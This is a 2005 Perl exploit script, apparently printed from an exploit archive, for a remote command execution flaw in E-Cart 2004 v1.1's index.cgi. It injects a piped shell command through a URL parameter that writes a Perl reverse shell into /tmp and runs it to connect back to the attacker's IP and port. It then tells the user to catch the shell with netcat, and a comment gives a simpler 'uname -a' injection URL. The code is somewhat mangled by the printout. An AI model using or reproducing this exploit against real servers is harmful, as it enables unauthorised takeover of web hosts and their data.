1 #!/usr/bin/perl
2 #
3 # Example added if code doesn’t work for ya:
4 # http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp−ns315.dat|uname%20−a|
5 # /str0ke
6 #
7 #
8 # info: emanuele@orvietolug.org
9 #
10 use IO::Socket;
11
12 print "\n\n ~~ www.badroot.org ~~ \n\n";
13 print " E−Cart E−Commerce Software index.cgi\n";
14 print " Remote Command Execution Vulnerability\n";
15 print " Affected version: <= E−Cart 2004 v1.1\n";
16 print " http://www.securityfocus.com/archive/1/396748/2005−04−20/2005−04−26/0 \n\n";
17 print " ~~ code by z\\ ~~\n\n\n";
18 print " 04.23.2005\n\n\n";
19
20
21 print "hostname: \n";
22 chomp($server=<STDIN>);
23
24 print "port: (default: 80)\n";
25 chomp($port=<STDIN>);
26 $port=80 if ($port =~/\D/ );
27 $port=80 if ($port eq "" );
28
29 print "path: (/cgi−bin/ecart/)\n";
30 chomp($path=<STDIN>);
31
32 print "your ip (for reverse connect): \n";
33 chomp($ip=<STDIN>);
34
35 print "your port (for reverse connect): \n";
36 chomp($reverse=<STDIN>);
37
38
39 print " \n\n";
40 print "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n";
41
42 print "[*] try to exploiting...\n";
43
44 $string="/$path/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp−ns315.dat|cd /tmp;echo ".q{use Socket;$execute= ’echo "‘uname −a‘";
echo "‘id‘";/bin/sh’;$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port,
$iaddr) || die("Error: $!\n");$proto=getprotobyname(’tcp’);socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n")
;connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET
");system($execute);close(STDIN)}." >>cbs.pl;perl cbs.pl $ip $reverse|";
45
46 print "[*] OK! \n";
47 print "[*] NOW, run in your box: nc −l −vv −p $reverse\n";
48 print "[*] starting connect back on $ip :$reverse\n";
Page 1/2
ECart 1.1 index.cgi Remote Command Execution Exploit
z
04/25/2005
49 print "[*] DONE!\n";
50 print "[*] Loock netcat windows and funny\n\n